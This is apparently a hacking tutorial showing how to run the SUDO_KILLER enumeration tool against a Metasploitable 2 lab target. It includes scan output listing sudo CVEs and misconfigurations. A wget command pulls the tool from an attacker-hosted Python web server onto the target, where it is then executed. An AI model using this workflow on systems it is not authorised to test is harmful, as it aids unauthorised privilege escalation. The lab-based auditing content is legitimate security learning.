How to Use SUDO_KILLER to Identify & Abuse Sudo Misconfigurations

Jan 13, 2020 06:24 PM
Sep 14, 2020 09:17 PM
637003333988422817.jpg

Sudo is a necessity on most Linux systems, most of which are probably being used as web servers. While the principle of least privilege is typically applied, sudo misconfigurations can easily lead to privilege escalation if not properly mediated. Which brings us to SUDO_KILLER, a tool used to identify sudo misconfigurations that can aid in privilege escalation.

The most glaring misconfiguration is running an outdated version of sudo, especially one that has known vulnerabilities. There is simply no excuse for it, and often the best course of action from a defensive point of view is just keeping everything updated.

Other issues arise from being able to run sudo without a password — all it takes is one command to get root in a situation like that. Sometimes, even just knowing if another user has used sudo can be advantageous to an attacker. Other things related to sudo, like enabling the SUID bit, can lead to some pretty nasty consequences if precautions aren't taken.

To demonstrate SUDO_KILLER, we will be using Metasploitable 2 as the target, and Kali Linux as our local machine.

Step 1: Initial Setup

The first thing we need to do is download SUDO_KILLER from GitHub. We can do this by cloning into the repository:

~# git clone https://github.com/TH3xACE/SUDO_KILLER

Cloning into 'SUDO_KILLER'...
remote: Enumerating objects: 59, done.
remote: Counting objects: 100% (59/59), done.
remote: Compressing objects: 100% (58/58), done.
remote: Total 414 (delta 34), reused 4 (delta 1), pack-reused 355
Receiving objects: 100% (414/414), 164.29 KiB | 1.51 MiB/s, done.
Resolving deltas: 100% (251/251), done.

Now there should be a new directory cloned from GitHub. Change into it using the cd command, and list the contents with ls to verify everything is there:

~/SUDO_KILLER# ls

Backup_old.sh  bins.txt  cve.sudo2.txt  cve.sudo.manual.txt  cve_updatev2.sh  Dockerfile  exploits  notes  Old_version.sh  README.md  SUDO_KILLERv1.3.3.sh

The SUDO_KILLER script is already executable, so we can use the dot-slash to run it. Tack on the -h flag to see the help menu and usage example:

~/SUDO_KILLER# ./SUDO_KILLERv1.3.3.sh -h

./SUDO_KILLERv1.3.3.sh: option requires an argument -- h

 Example: ./sudo_killer.sh -c -r report.txt -e /tmp/

OPTIONS:
-k  Enter keyword
-e  Enter export location
-s  Supply user password for sudo checks (NOT SECURE)
-c  Include sudo CVE
-r  Enter report name
-h  Displays this help text

Running with no options = limited scans/no output file
 #########################################################

Seems pretty straightforward, but what if we want to run it on a target that's configured in such a way that we don't have internet access? We can't just clone the repo if we can't reach it in the first place.

Some of the features of this tool require other elements in the directory we cloned, so we can either transfer them over to the target one by one, or we can create an archive and then transfer it over in one go.

But first, to demonstrate, let's make sure we have a session on the target with a fully interactive shell, so we can use SUDO_KILLER to its full potential.

Step 2: Transfer to Target

Before we transfer SUDO_KILLER over to our target, we need to run the update script so we can have an updated list of CVEs to compare against. Doing so will reach out to the internet, so we need to do it on our local machine. First, in our cloned GitHub repo, make the update script executable:

~/SUDO_KILLER# chmod +x cve_updatev2.sh

Then, we can run it, and it will create an updated list of CVEs:

~/SUDO_KILLER# ./cve_updatev2.sh

--2019-08-01 12:43:17--  https://www.cvedetails.com/vulnerability-list.php?vendor_id=118
Resolving www.cvedetails.com (www.cvedetails.com)... 104.18.54.201, 104.18.55.201, 2606:4700:30::6812:37c9, ...
Connecting to www.cvedetails.com (www.cvedetails.com)|104.18.54.201|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘cve_list.html’

cve_list.html                                             [ <=>                                                                                                                   ]  53.55K  --.-KB/s    in 0.1s

2020-01-01 12:43:18 (526 KB/s) - ‘cve_list.html’ saved [54831]

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 47089    0 47089    0     0   114k      0 --:--:-- --:--:-- --:--:--  114k
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 47089    0 47089    0     0   148k      0 --:--:-- --:--:-- --:--:--  148k
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 79784    0 79784    0     0   202k      0 --:--:-- --:--:-- --:--:--  202k

...

Next, move up one level so that we are no longer in the SUDO_KILLER directory:

~/SUDO_KILLER# cd ..

Now, we can use tar to compress the directory into a single archive:

~# tar -zcvf sudo_killer.tar.gz SUDO_KILLER/

The syntax is tar and its flags, followed by the desired name of the archive (ending in .tar.gz), followed by the name of the directory to compress.

We can then serve the file using Python's HTTP server:

~# python -m SimpleHTTPServer

Serving HTTP on 0.0.0.0 port 8000 ...

Back on the target, change into a suitable directory to work out of:

target@metasploitable:/$ cd /var/tmp/

And use the wget utility to retrieve the file being served on our local machine:

target@metasploitable:/var/tmp$ wget http://10.10.0.1:8000/sudo_killer.tar.gz

--14:52:35--  http://10.10.0.1:8000/sudo_killer.tar.gz
           => `sudo_killer.tar.gz'
Connecting to 10.10.0.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 273,301 (267K) [application/gzip]

100%[=========================================================================================================================================================================>] 273,301       --.--K/s

14:52:35 (2.35 MB/s) - `sudo_killer.tar.gz' saved [273301/273301]

Now that the file is transferred over, we can use tar again to unpack the archive:

target@metasploitable:/var/tmp$ tar -xvf sudo_killer.tar.gz

We should be able to change into the unpacked directory now:

target@metasploitable:/var/tmp$ cd SUDO_KILLER/

And list all the files:

target@metasploitable:/var/tmp/SUDO_KILLER$ ls

Backup_old.sh  bins.txt  cve.sudo2.txt  cve.sudo.manual.txt  cve_updatev2.sh  Dockerfile  exploits  notes  Old_version.sh  README.md  SUDO_KILLERv1.3.3.sh

Using tar to create an archive and transferring it to a remote host is an easy way to move multiple files or directories between machines.

Step 3: Basic Usage

Now that we're all set up on the target, we can use SUDO_KILLER to identify potential sudo misconfigurations. We can run the script without any options for a basic rundown of the environment and its settings pertaining to sudo:

target@metasploitable:/var/tmp/SUDO_KILLER$ ./SUDO_KILLERv1.3.3.sh

   _____ _    _ _____   ____    _  _______ _      _      ______ _____
  / ____| |  | |  __ \ / __ \  | |/ /_   _| |    | |    |  ____|  __ \
 | (___ | |  | | |  | | |  | | | ' /  | | | |    | |    | |__  | |__) |
  \___ \| |  | | |  | | |  | | |  <   | | | |    | |    |  __| |  _  /
  ____) | |__| | |__| | |__| | | . \ _| |_| |____| |____| |____| | \ \
 |_____/ \____/|_____/ \____/  |_|\_\_____|______|______|______|_|  \_\

 @TH3_ACE - BLAIS David
 Contribute and collaborate to the KILLER project @ https://github.com/TH3xACE

[+] Intro
Scan started at:
Wed Jan 1 14:55:25 EDT 2020

Current user: target

============ Initial check - Quick ==================

[+] Sudo version:
Sudo version 1.6.9p10

[+] SUDO possible without a password!
usage: sudo -h | -K | -k | -L | -l | -V | -v
usage: sudo [-bEHPS] [-p prompt] [-u username|#uid] [VAR=value]
            {-i | -s | <command>}
usage: sudo -e [-S] [-p prompt] [-u username|#uid] file ...

[-] Accounts that have recently used sudo:
/home/msfadmin/.sudo_as_admin_successful

============ Checking for Common Misconfiguration ==================

[+] Sudo without password for other user, was found:

[-] You can impersonate users, by running the cmd: sudo -u [USER] /path/bin
============ Checking for File owner hijacking ==================

============ Checking for File permission hijacking ==================

============ Checking for Missing scripts from sudoers ==================

sudo: Only one of the -e, -h, i, -k, -K, -l, -s, -v or -V options may be used
[+] The script/s found in sudoers can be found at: /tmp/sh_list.txt
[-] Checking whether there are any missing scripts defined in sudoers but that no longer exists on system:

============ Checking for Excessive directory right where the scripts from sudoers reside ==================

[+] The script/s found in sudoers can be found at: /tmp/sh_list.txt
============ Checking for Writable scripts from sudoers ==================

============ Checking whether vulnerable to Credential Harvesting ==================

target
============ Checking for Dangerous environment variables ==================

============ Checking for Dangerous bin from sudoers ==================

[+] Common dangerous bins:
[-] dangerous bins (https://gtfobins.github.io/#+sudo):

  [*##################### SCAN_COMPLETED ##########################*]

It starts with a nice banner, some information about the author, and tells us the current user the script is running as.

Next, it gives us the version of sudo that's installed, which can be useful for finding exploits, especially in older versions. The tool then tells us if it is possible to sudo without a password, and it lists any accounts on the system that have recently used sudo successfully.

It then checks for some common misconfigurations, various file permissions, and dangerous environment variables and binaries. We can also use the -c flag to automatically check for vulnerabilities related to the version of sudo that was found:

target@metasploitable:/var/tmp/SUDO_KILLER$ ./SUDO_KILLERv1.3.3.sh -c

   _____ _    _ _____   ____    _  _______ _      _      ______ _____
  / ____| |  | |  __ \ / __ \  | |/ /_   _| |    | |    |  ____|  __ \
 | (___ | |  | | |  | | |  | | | ' /  | | | |    | |    | |__  | |__) |
  \___ \| |  | | |  | | |  | | |  <   | | | |    | |    |  __| |  _  /
  ____) | |__| | |__| | |__| | | . \ _| |_| |____| |____| |____| | \ \
 |_____/ \____/|_____/ \____/  |_|\_\_____|______|______|______|_|  \_\

 @TH3_ACE - BLAIS David
 Contribute and collaborate to the KILLER project @ https://github.com/TH3xACE

[+] Intro
Scan started at:
Wed Jan 1 15:08:44 EDT 2020

Current user: target

============ Initial check - Quick ==================

[+] Sudo version:
Sudo version 1.6.9p10

[+] SUDO possible without a password!
usage: sudo -h | -K | -k | -L | -l | -V | -v
usage: sudo [-bEHPS] [-p prompt] [-u username|#uid] [VAR=value]
            {-i | -s | <command>}
usage: sudo -e [-S] [-p prompt] [-u username|#uid] file ...

[-] Accounts that have recently used sudo:
/home/msfadmin/.sudo_as_admin_successful

============ Checking for disclosed vulnerabilities related to version used (CVE) ==================

[+] Sudo version vulnerable to the following CVEs:
 CVE-2011-0008 + http://www.mandriva.com/security/advisories?name=MDVSA-2011:018 https://exchange.xforce.ibmcloud.com/vulnerabilities/64965 http://lists.fedoraproject.org/pipermail/package-announce/2011-January/053263.html http://lists.fedoraproject.org/pipermail/package-announce/2011-January/053341.html http://www.vupen.com/english/advisories/2011/0195 https://bugzilla.redhat.com/show_bug.cgi?id=668843 http://www.vupen.com/english/advisories/2011/0199
 CVE-2010-1646 + https://bugzilla.redhat.com/show_bug.cgi?id=598154 http://www.vupen.com/english/advisories/2010/1478 http://www.vupen.com/english/advisories/2010/1518 http://www.vupen.com/english/advisories/2011/0212 http://www.vupen.com/english/advisories/2010/1519 http://www.sudo.ws/sudo/alerts/secure_path.html http://www.vupen.com/english/advisories/2010/1452 http://www.sudo.ws/repos/sudo/rev/a09c6812eaec http://www.sudo.ws/repos/sudo/rev/3057fde43cf0 http://www.securityfocus.com/bid/40538 http://www.securitytracker.com/id?1024101 http://www.securityfocus.com/archive/1/514489/100/0/threaded http://www.redhat.com/support/errata/RHSA-2010-0475.html http://www.mandriva.com/security/advisories?name=MDVSA-2010:118 http://www.debian.org/security/2010/dsa-2062 http://wiki.rpath.com/Advisories:rPSA-2010-0075 http://lists.opensuse.org/opensuse-security-announce/2011-01/msg00006.html http://security.gentoo.org/glsa/glsa-201009-03.xml http://lists.fedoraproject.org/pipermail/package-announce/2010-June/043026.html http://lists.fedoraproject.org/pipermail/package-announce/2010-June/042838.html http://lists.fedoraproject.org/pipermail/package-announce/2010-June/043012.html
============ Checking for Common Misconfiguration ==================

[+] Sudo without password for other user, was found:

[-] You can impersonate users, by running the cmd: sudo -u [USER] /path/bin
============ Checking for File owner hijacking ==================

============ Checking for File permission hijacking ==================

============ Checking for Missing scripts from sudoers ==================

sudo: Only one of the -e, -h, i, -k, -K, -l, -s, -v or -V options may be used
[+] The script/s found in sudoers can be found at: /tmp/sh_list.txt
[-] Checking whether there are any missing scripts defined in sudoers but that no longer exists on system:

============ Checking for Excessive directory right where the scripts from sudoers reside ==================

[+] The script/s found in sudoers can be found at: /tmp/sh_list.txt
============ Checking for Writable scripts from sudoers ==================

============ Checking whether vulnerable to Credential Harvesting ==================

target
============ Checking for Dangerous environment variables ==================

============ Checking for Dangerous bin from sudoers ==================

[+] Common dangerous bins:
[-] dangerous bins (https://gtfobins.github.io/#+sudo):

  [*##################### SCAN_COMPLETED ##########################*]

That gives us some CVE numbers and supporting links. The output is a little messy, but the tool is still being actively developed, so that may change in the future. For now, though, it works.

SUDO_KILLER also has a handy feature to save the results to a file. Use the -r flag followed by the desired name of the report to do so:

target@metasploitable:/var/tmp/SUDO_KILLER$ ./SUDO_KILLERv1.3.3.sh -c -r results.txt

   _____ _    _ _____   ____    _  _______ _      _      ______ _____
  / ____| |  | |  __ \ / __ \  | |/ /_   _| |    | |    |  ____|  __ \
 | (___ | |  | | |  | | |  | | | ' /  | | | |    | |    | |__  | |__) |
  \___ \| |  | | |  | | |  | | |  <   | | | |    | |    |  __| |  _  /
  ____) | |__| | |__| | |__| | | . \ _| |_| |____| |____| |____| | \ \
 |_____/ \____/|_____/ \____/  |_|\_\_____|______|______|______|_|  \_\

 @TH3_ACE - BLAIS David
 Contribute and collaborate to the KILLER project @ https://github.com/TH3xACE

[+] Intro
Scan started at:
Wed Jan 1 15:10:42 EDT 2020

Current user: target

[+] Report name:  results.txt-20-01-01

============ Initial check - Quick ==================

...

SUDO_KILLER might not have a ton of options, but it is a great way to identify any potential problems with sudo that could lead to privilege escalation.

Wrapping Up

Today, we learned how to use SUDO_KILLER, a tool that can identify possible sudo misconfigurations that could be used in privilege escalation. First, we downloaded the tool from GitHub and went through some basic usage. Next, we saw how to transfer it to a target in situations where internet access isn't available. Finally, we ran the tool on the target and saw some potential problems with sudo that could be abused. SUDO_KILLER is a neat little tool that can help hackers get root via sudo misconfigs.

Cover image by radu lucian/FreeImages

Comments

No Comments Exist

Be the first, drop a comment!